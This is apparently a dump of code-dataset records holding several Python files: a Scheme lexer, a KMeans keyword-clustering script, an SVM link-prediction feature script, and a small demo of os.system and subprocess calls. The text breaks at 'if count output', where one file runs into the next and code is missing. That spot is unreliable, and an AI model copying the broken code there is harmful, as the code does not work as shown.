'OR',\n 'do' : 'DO',\n 'cons' : 'CONS',\n 'cdr' : 'CDR',\n 'car' : 'CAR',\n 'last' : 'LAST',\n 'list' : 'LIST',\n 'remainder' : 'REMAINDER',\n 'log' : 'LOG',\n 'read' : 'READ',\n 'display' : 'DISPLAY',\n }\n\n# Define tokens and add the reserved words as a list.\ntokens = [\n 'EQQUES',\n 'NEQQUES',\n 'ID',\n 'ADD',\n 'MINUS',\n 'MULTIPLY',\n 'DIVIDE',\n 'EQUALS',\n 'GREATER',\n 'LESS',\n 'GREATER_EQUAL',\n 'LESS_EQUAL',\n 'OPEN_PAR',\n 'CLOSE_PAR',\n 'OPEN_BRA',\n 'CLOSE_BRA',\n 'OPEN_KEY',\n 'CLOSE_KEY',\n 'COMMA',\n 'TRUE',\n 'FALSE',\n 'SPACE',\n 'NEW_LINE',\n 'COMMENT',\n 'COM_BLOCK',\n 'INT',\n 'FLOAT',\n 'CHARACTER',\n 'STRING',\n ] + list(reserved.values())\n\n# Define all the token specifications in order of importance (usually the length of the token).\nt_ignore_COM_BLOCK = r'\\#\\|(.|\\n|\\t)*\\|\\#'\n\nt_ADD = r'\\+'\nt_MINUS = r'\\-'\nt_MULTIPLY = r'\\*'\nt_DIVIDE = r'\\/'\nt_EQUALS = r'\\='\nt_GREATER_EQUAL = r'\\>\\='\nt_GREATER = r'\\>'\nt_LESS_EQUAL = r'\\<\\='\nt_LESS = r'\\<'\nt_OPEN_PAR = r'\\('\nt_CLOSE_PAR = r'\\)'\nt_OPEN_BRA = r'\\['\nt_CLOSE_BRA = r'\\]'\nt_OPEN_KEY = r'\\{'\nt_CLOSE_KEY = r'\\}'\nt_COMMA = r'\\,'\nt_TRUE = r'\\#t'\nt_FALSE = r'\\#f'\nt_CHARACTER = r'\\'[^\\']+\\''\nt_STRING = r'\\\"[^\"]*\\\"'\n\n# Ignore elements that are goint to be in the code but aren't required.\nt_ignore_SPACE = r'\\ '\nt_ignore_TAB = '\\\\t'\nt_ignore_ENTER = '\\\\n'\nt_ignore_COMMENT = r'\\;.*'\n\ndef t_EQQUES(t):\n r'eq\\?'\n return t\n\ndef t_NEQQUES(t):\n r'neq\\?'\n return t\n\n# Define a regular expression to detect float numbers, located above the integer identifier to prioritize it.\ndef t_FLOAT(t):\n r'\\d+\\.\\d+'\n t.value = float(t.value)\n return t\n\n# Define a regular expression to detect itneger numbers.\ndef t_INT(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n# Define a regular expression to detect identifiers.\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reserved.get(t.value,'ID')\n return t\n\n# Define the error method for invalid characters.\ndef t_error(t):\n t.type = \"ERROR\"\n print(\"ERROR: Illegal character '%s'\" % t.value[0])\n t.value = t.value[0]\n t.lexer.skip(1)\n return t\n\n'''def t_error(t):\n print(\"ERROR: Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)'''\n\n# Create lexer.\nlexer = lex.lex()\n#string = \"'a' ' ' '/' read display '4' = '=' \\\"b\\\" cond \\\"Simple \\tsentence with issues\\\" if\\tIF cond else case lambda\\ndefine and or do cons cdr car#|Bloque de comentarios\\nIgnorame pls\\tsi eres tan amable\\n|#last list remainder log id id1 id2 id_ id_2_3_4 id_test_3 iDF id_Fg4_5f +-/*;Comentario, ignorame pls\\n>=><=<()[]{},#t #f eq? neq?\"\n#lexer.input(string)\n'''\nwhile True:\n tok = lexer.token()\n if not tok:\n break\n if tok.type == \"ERROR\":\n break\n print(tok)\n'''\n","sub_path":"scheme_lexer.py","file_name":"scheme_lexer.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355486092","text":"from sklearn.cluster import KMeans\nimport numpy as np\nimport pickle\n# https://stackoverflow.com/questions/27889873/clustering-text-documents-using-scikit-learn-kmeans-in-python\n\n# fine-tuning number of clusters: 5, then 4 and 6\nNUM_CLUSTERS = 8\n\nwith open('data/index_to_vocab.pkl', 'rb') as index_vocab_pkl:\n\tindex_to_vocab_dict = pickle.load(index_vocab_pkl)\ndoc_by_vocab_mat = np.load(\"data/doc_by_vocab.npy\") \n\nmodel = KMeans(n_clusters=NUM_CLUSTERS, random_state=9965130, init='k-means++', max_iter=1000, n_init=10)\nmodel.fit(doc_by_vocab_mat)\n\n# print(\"Top terms per cluster:\")\norder_centroids = model.cluster_centers_.argsort()[:, ::-1]\nrelevant_keywords = []\nfor i in range(NUM_CLUSTERS):\n # print (\"Cluster %d:\" % i)\n cluster = set()\n for ind in order_centroids[i, :10]:\n # print (' %s' % index_to_vocab_dict[ind])\n cluster.add(index_to_vocab_dict[ind])\n print\n relevant_keywords.append(cluster)\n print(cluster)\n\n# output [ sets(keywords) ] to go to a pre-mapped list in search.py\nwith open(\"data/query_expansion_clusters.pkl\", \"wb+\") as file:\n\t\tpickle.dump(relevant_keywords, file)","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"343509753","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 27 23:29:35 2017\n\n@author: shwetank\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics.pairwise import cosine_similarity as cs\nfrom sklearn.metrics import jaccard_similarity_score as js\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix\nimport warnings\nimport random\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\nprint(\"Reading Adjacency Matrix\")\nA = pd.read_csv(\"adjMat.csv\",header=None);\n\nno_edges = A.sum().sum()\nno_nodes = A.shape[1]\n\n###################### Basic Feature Definitions ##########################\nprint(\"Let Us Start Basic Feature Definition of IB and OB and read exp(A)\")\nA = A.values \nexpA = pd.read_csv(\"exp_mat.csv\",header = None)\nexpA = expA.values\n#expA_n = expA/(expA.max().max())\n#expA_n = expA_n.round(5)\nIB_exp = np.sum(expA,axis = 0) ###columnwise Inboundnes\nOB_exp = np.sum(expA,axis = 1) ###rowwise Outboundness\nIB_adj = np.sum(A,axis = 0)\nOB_adj = np.sum(A,axis = 1)\n\ncntrl = [] \nfor i in range(no_nodes): \n cntrl.append(expA[i][i])\n\nprint(\"Start appending features\")\n\nfeat_train = []\nlab_train = []\nfor i in range(no_nodes):\n for j in range(no_nodes):\n lab_train.append(A[i][j])\n temp = []\n #node features\n \n temp.append(IB_exp[i])\n temp.append(IB_exp[j])\n temp.append(OB_exp[i])\n temp.append(OB_exp[j]) \n temp.append(cntrl[i])\n temp.append(cntrl[j])\n #edge features\n temp.append(expA[i][j])\n \n temp.append(IB_adj[i])\n temp.append(IB_adj[j])\n temp.append(OB_adj[i])\n temp.append(OB_adj[j])\n foo = cs(A[i],A[j])\n temp.append(foo[0][0])\n temp.append(js(A[i],A[j]))\n \n feat_train.append(temp)\n\n\nprint(\"Calculating training and testing feature\")\nedge_size = 2430\nper = 0.8 \nfeat_ones = []\nfeat_zeros = []\nlab_ones = []\nlab_zeros = []\ncount = 0\nfor i in range(no_nodes):\n for j in range(no_nodes):\n if i==j:\n continue\n if lab_train[300*i+j]==1:\n feat_ones.append(feat_train[300*i+j])\n lab_ones.append(1)\n else:\n if count output\n os.system(\"ipconfig\") \n print( os.system('ls -la') )\n\n\n # 'popen' can make a connection to std input and output\n stream = os.popen(\"ipconfig\")\n print(stream.read())\n\n stream = os.popen('ls -la')\n print(stream.read())\n\n # subprocss open\n # subprocess.run([\"ls\", \"l\", \"//c/\"])\n print(subprocess.Popen(\"echo Hello world-d''!\", shell=True, stdout=subprocess.PIPE).stdout.read())\n\n # It will return, after the sub process complete\n print(subprocess.call(\"echo Hello world!\", shell=True))\n\n res = 1\n\nif __name__ == \"__main__\":\n\n main()\n\n","sub_path":"Python35/standard lib/test_os.py","file_name":"test_os.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}